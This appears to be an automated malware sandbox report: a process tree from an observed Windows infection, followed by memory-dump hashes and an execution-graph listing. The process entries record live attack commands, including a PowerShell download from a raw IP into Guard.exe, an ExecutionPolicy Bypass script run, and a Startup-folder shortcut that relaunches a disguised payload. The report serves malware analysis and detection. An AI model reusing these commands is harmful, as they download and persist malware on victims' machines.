                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                  Start time:15:06:12
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
                                                                                                                                                                                                                  Imagebase:0x7ff656cb0000
                                                                                                                                                                                                                  File size:1'083'904 bytes
                                                                                                                                                                                                                  MD5 hash:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                  • Detection: 32%, ReversingLabs
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                  Start time:15:06:12
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                  Start time:15:06:12
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                  Start time:15:06:13
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6584 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                  Start time:15:06:13
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6864 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                  Start time:15:06:15
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                  MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                  Start time:15:06:15
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                  MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                  Start time:15:06:18
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                  Start time:15:06:18
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                  Start time:15:06:24
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Users\Public\Guard.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                                                                                                                                                  Imagebase:0x350000
                                                                                                                                                                                                                  File size:893'608 bytes
                                                                                                                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                  Start time:15:06:26
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                  Start time:15:06:26
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                  Start time:15:06:40
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                                                                                                                                                  Imagebase:0x7ff72f7c0000
                                                                                                                                                                                                                  File size:170'496 bytes
                                                                                                                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                  Start time:15:06:41
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                                                                                                                                                  Imagebase:0xae0000
                                                                                                                                                                                                                  File size:893'608 bytes
                                                                                                                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                  Start time:15:07:08
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6812 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.2403647580.0000022B3F430000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022B3F430000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_22b3f430000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0q9$0q9
                                                                                                                                                                                                                    • API String ID: 0-2358745892
                                                                                                                                                                                                                    • Opcode ID: 08208a7ce72d26685f6271ba10cd867a0a70df1009c1d4b1890173631d887759
                                                                                                                                                                                                                    • Instruction ID: 0845435ef9ed2ecb1fbc8b9d37f4ff0bafa089862283a3afd3ea5277813b6cd2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08208a7ce72d26685f6271ba10cd867a0a70df1009c1d4b1890173631d887759
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C511E16121DA880FFB5EDABC542C3283BD0EBA6355F4901EB9486CB2F7ED159CC08251
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.2403690977.0000022B3F240000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022B3F240000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_22b3f240000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                    • Instruction ID: 183c256e935d0953f7d96e4a9d444f75ac36638a1f6f81a7f4cddb29da42fa79
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C9002048D9406A5D41591D11C4D25C5140B788250FD544D0985790194DD8D02D61192
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 304cb422f9a58b2e17e6bf9375c9727c39c488c6615e970536ae56f55e25cd10
                                                                                                                                                                                                                    • Instruction ID: 45c7c9bac72bc0b93bd91e5d66671ec803c46b780fcc01563d50068b5ea4bbe8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 304cb422f9a58b2e17e6bf9375c9727c39c488c6615e970536ae56f55e25cd10
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60424422F0EBC90FE7A6976818652B9BBE1EF92211B0901FBD28DC75D3DD48AC05C341
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: @2$@2$@2$H2
                                                                                                                                                                                                                    • API String ID: 0-3331150452
                                                                                                                                                                                                                    • Opcode ID: cf234b5bf24b00189eaa73b8650097cd55a22c9c3f020cf45e79ea0087693211
                                                                                                                                                                                                                    • Instruction ID: 564f9a059dd267c3f76cd1785833081fa22f683a3ba0e1e2c5901d20b6043e89
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf234b5bf24b00189eaa73b8650097cd55a22c9c3f020cf45e79ea0087693211
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E14732F0EF494FEBA5DB1884656B8B7D1EF95312B1801BEE24DC7592DA65EC01C340
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: @2$@2
                                                                                                                                                                                                                    • API String ID: 0-2352847036
                                                                                                                                                                                                                    • Opcode ID: 3194cbb02fe56727de12f499cd947732272ecbe3ad6ec0b2dc77e5e75cb2907a
                                                                                                                                                                                                                    • Instruction ID: e97f8d3c13ebe6d2c6da17145aa3972fc66ada5d54bf117bad9692b0659b9dda
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3194cbb02fe56727de12f499cd947732272ecbe3ad6ec0b2dc77e5e75cb2907a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94511836F0EE4A5FEBB4DB0D94A56B8B7D1EFA8312B0401BED24DC7592CE65AC019340
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: T2
                                                                                                                                                                                                                    • API String ID: 0-2724177064
                                                                                                                                                                                                                    • Opcode ID: fd19a0bcbdc2be58b4d509990ca1f3f08454d7a6df8016780cc7952c1bafc85c
                                                                                                                                                                                                                    • Instruction ID: 4b6fd9cfa325cb7b0c484318574ade58afc38a3b4820afa3684f48972bea20bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd19a0bcbdc2be58b4d509990ca1f3f08454d7a6df8016780cc7952c1bafc85c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD512352F0FBC60FE396962918B52B87BE1EF96211B0901FBD049CB1E3EC4AAC05D751
                                                                                                                                                                                                                    Memory Dump Source

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.7%
Total number of Nodes: 1423
Total number of Limit Nodes: 40
7ff656cfd2d3 95228->95226 95230 7ff656cd4c68 4 API calls 95228->95230 95229 7ff656cb7d2f memcpy_s 95229->95207 95230->95229 95231->95215 95232->95214 95233->95229 95235 7ff656cbddc7 memcpy_s 95234->95235 95236 7ff656cbdda9 95234->95236 95235->95226 95236->95235 95238 7ff656cba7c0 95236->95238 95239 7ff656cba7dd memcpy_s 95238->95239 95240 7ff656cba7ed 95238->95240 95239->95235 95241 7ff656cfe7da 95240->95241 95242 7ff656cd4c68 4 API calls 95240->95242 95242->95239 95244 7ff656cb61e0 95243->95244 95245 7ff656cfc5f8 95243->95245 95244->95192 95247 7ff656d2ad94 39 API calls wcsftime 95244->95247 95245->95244 95246 7ff656cfc602 DestroyIcon 95245->95246 95246->95244 95247->95192 95248 7ff656d0e263 95249 7ff656d0e271 95248->95249 95267 7ff656cc2680 95248->95267 95249->95249 95250 7ff656cc2856 95251 7ff656cc29c8 PeekMessageW 95251->95267 95252 7ff656cc26da GetInputState 95252->95251 95252->95267 95254 7ff656d0d181 TranslateAcceleratorW 95254->95267 95255 7ff656cc2a1f TranslateMessage DispatchMessageW 95256 7ff656cc2a33 PeekMessageW 95255->95256 95256->95267 95257 7ff656cc28b9 timeGetTime 95257->95267 95258 7ff656d0d2bb timeGetTime 95281 7ff656cd2ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95258->95281 95263 7ff656cc66c0 300 API calls 95263->95267 95264 7ff656cc3c20 300 API calls 95264->95267 95265 7ff656d334e4 77 API calls 95265->95267 95267->95250 95267->95251 95267->95252 95267->95254 95267->95255 95267->95256 95267->95257 95267->95258 95267->95263 95267->95264 95267->95265 95268 7ff656cc2b70 95267->95268 95275 7ff656cd2de8 95267->95275 95280 7ff656cc2e30 300 API calls 2 library calls 95267->95280 95282 7ff656d33a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95267->95282 95283 7ff656d4a320 300 API calls Concurrency::wait 95267->95283 95269 7ff656cc2b96 95268->95269 95271 7ff656cc2ba9 95268->95271 95284 7ff656cc2050 95269->95284 95304 7ff656d334e4 77 API calls 3 library calls 
95271->95304 95272 7ff656cc2b9e 95272->95267 95274 7ff656d0e55c 95276 7ff656cd2e0d 95275->95276 95277 7ff656cd2e2a 95275->95277 95276->95267 95277->95276 95278 7ff656cd2e5b IsDialogMessageW 95277->95278 95279 7ff656d19d94 GetClassLongPtrW 95277->95279 95278->95276 95278->95277 95279->95277 95279->95278 95280->95267 95281->95267 95282->95267 95283->95267 95285 7ff656cc3c20 300 API calls 95284->95285 95289 7ff656cc20a8 95285->95289 95286 7ff656cc212d 95286->95272 95288 7ff656d0d08d 95289->95286 95290 7ff656cc2552 95289->95290 95297 7ff656cc2244 95289->95297 95298 7ff656d0d06f 95289->95298 95300 7ff656cc22a5 memcpy_s 95289->95300 95301 7ff656cc23cb memcpy_s 95289->95301 95292 7ff656cd4c68 4 API calls 95290->95292 95291 7ff656d0d036 95307 7ff656cbee20 5 API calls Concurrency::wait 95291->95307 95292->95301 95294 7ff656cd4c68 4 API calls 95294->95300 95295 7ff656d0d062 95308 7ff656cbee20 5 API calls Concurrency::wait 95295->95308 95297->95301 95305 7ff656cc1ce4 301 API calls Concurrency::wait 95297->95305 95309 7ff656d334e4 77 API calls 3 library calls 95298->95309 95300->95294 95300->95301 95301->95291 95303 7ff656d334e4 77 API calls 95301->95303 95306 7ff656cb4a60 300 API calls 95301->95306 95303->95301 95304->95274 95305->95300 95306->95301 95307->95295 95308->95298 95309->95288 95310 7ff656cd5328 95333 7ff656cd4cac 95310->95333 95313 7ff656cd5474 95363 7ff656cd57e4 7 API calls 2 library calls 95313->95363 95314 7ff656cd5344 95316 7ff656cd547e 95314->95316 95318 7ff656cd5362 95314->95318 95364 7ff656cd57e4 7 API calls 2 library calls 95316->95364 95319 7ff656cd5387 95318->95319 95320 7ff656cd53a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 95318->95320 95339 7ff656ceada4 95318->95339 95323 7ff656cd540d 95320->95323 95360 7ff656cd9204 35 API calls FindHandler 95320->95360 95321 7ff656cd5489 abort 95346 7ff656cd5930 95323->95346 95325 7ff656cd5412 95349 7ff656cb3730 95325->95349 95330 7ff656cd5435 95330->95321 95362 7ff656cd4e90 8 API calls 2 
library calls 95330->95362 95332 7ff656cd544c 95332->95319 95334 7ff656cd4cce __scrt_initialize_crt 95333->95334 95365 7ff656cd65ec 95334->95365 95336 7ff656cd4cd7 95336->95313 95336->95314 95337 7ff656cd4cd3 __scrt_initialize_crt 95337->95336 95373 7ff656cd6620 8 API calls 3 library calls 95337->95373 95340 7ff656ceade0 95339->95340 95341 7ff656ceadff 95339->95341 95340->95341 95398 7ff656cb10e8 95340->95398 95403 7ff656cb1080 95340->95403 95408 7ff656cb1064 95340->95408 95413 7ff656cb1048 95340->95413 95341->95320 95611 7ff656cd6240 95346->95611 95350 7ff656cb3743 IsThemeActive 95349->95350 95351 7ff656cb37a3 95349->95351 95613 7ff656cd92d0 95350->95613 95361 7ff656cd5974 GetModuleHandleW 95351->95361 95357 7ff656cb377d 95625 7ff656cb37b0 95357->95625 95359 7ff656cb3785 SystemParametersInfoW 95359->95351 95360->95323 95361->95330 95362->95332 95363->95316 95364->95321 95366 7ff656cd65f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 95365->95366 95374 7ff656cd7290 95366->95374 95369 7ff656cd6603 95369->95337 95371 7ff656cd660c 95371->95369 95381 7ff656cd72d8 DeleteCriticalSection 95371->95381 95373->95336 95375 7ff656cd7298 95374->95375 95377 7ff656cd72c9 95375->95377 95378 7ff656cd65ff 95375->95378 95382 7ff656cd7614 95375->95382 95387 7ff656cd72d8 DeleteCriticalSection 95377->95387 95378->95369 95380 7ff656cd7218 8 API calls 3 library calls 95378->95380 95380->95371 95381->95369 95388 7ff656cd7310 95382->95388 95385 7ff656cd7654 95385->95375 95386 7ff656cd765f InitializeCriticalSectionAndSpinCount 95386->95385 95387->95378 95389 7ff656cd7371 95388->95389 95396 7ff656cd736c try_get_function 95388->95396 95389->95385 95389->95386 95390 7ff656cd73a0 LoadLibraryExW 95391 7ff656cd73c1 GetLastError 95390->95391 95390->95396 95391->95396 95392 7ff656cd7462 GetProcAddress 95393 7ff656cd7473 95392->95393 95393->95389 95394 7ff656cd7454 95394->95389 95394->95392 95395 7ff656cd7439 FreeLibrary 95395->95396 95396->95389 95396->95390 95396->95394 95396->95395 95397 
7ff656cd73fb LoadLibraryExW 95396->95397 95397->95396 95418 7ff656cd1d80 95398->95418 95402 7ff656cd4f15 95402->95340 95443 7ff656cb7920 95403->95443 95405 7ff656cb109e 95473 7ff656cd4ebc 34 API calls _onexit 95405->95473 95407 7ff656cd4f15 95407->95340 95507 7ff656cb7ec0 95408->95507 95410 7ff656cb106d 95543 7ff656cd4ebc 34 API calls _onexit 95410->95543 95412 7ff656cd4f15 95412->95340 95592 7ff656cb7718 95413->95592 95417 7ff656cd4f15 95417->95340 95419 7ff656cb9640 4 API calls 95418->95419 95420 7ff656cd1db2 GetVersionExW 95419->95420 95421 7ff656cb7cf4 4 API calls 95420->95421 95423 7ff656cd1dfc 95421->95423 95422 7ff656cbdda4 4 API calls 95422->95423 95423->95422 95424 7ff656cd1e87 95423->95424 95425 7ff656cbdda4 4 API calls 95424->95425 95430 7ff656cd1ea4 95425->95430 95426 7ff656d19645 95427 7ff656d1964f 95426->95427 95441 7ff656d232f4 LoadLibraryA GetProcAddress 95427->95441 95428 7ff656cd1f3c GetCurrentProcess IsWow64Process 95429 7ff656cd1f7e fread_s 95428->95429 95429->95427 95432 7ff656cd1f86 GetSystemInfo 95429->95432 95430->95426 95430->95428 95434 7ff656cb10f1 95432->95434 95433 7ff656d196b1 95435 7ff656d196d7 GetSystemInfo 95433->95435 95436 7ff656d196b5 95433->95436 95440 7ff656cd4ebc 34 API calls _onexit 95434->95440 95438 7ff656d196bf 95435->95438 95442 7ff656d232f4 LoadLibraryA GetProcAddress 95436->95442 95438->95434 95439 7ff656d196f0 FreeLibrary 95438->95439 95439->95434 95440->95402 95441->95433 95442->95438 95444 7ff656cb7948 wcsftime 95443->95444 95445 7ff656cb9640 4 API calls 95444->95445 95446 7ff656cb7a02 95445->95446 95474 7ff656cb5680 95446->95474 95448 7ff656cb7a0c 95481 7ff656cd3a38 95448->95481 95451 7ff656cb71f8 4 API calls 95452 7ff656cb7a2c 95451->95452 95487 7ff656cb4680 95452->95487 95454 7ff656cb7a3d 95455 7ff656cb9640 4 API calls 95454->95455 95456 7ff656cb7a47 95455->95456 95491 7ff656cba854 95456->95491 95459 7ff656cfd05c RegQueryValueExW 95460 7ff656cfd131 RegCloseKey 95459->95460 95461 7ff656cfd08f 95459->95461 95464 
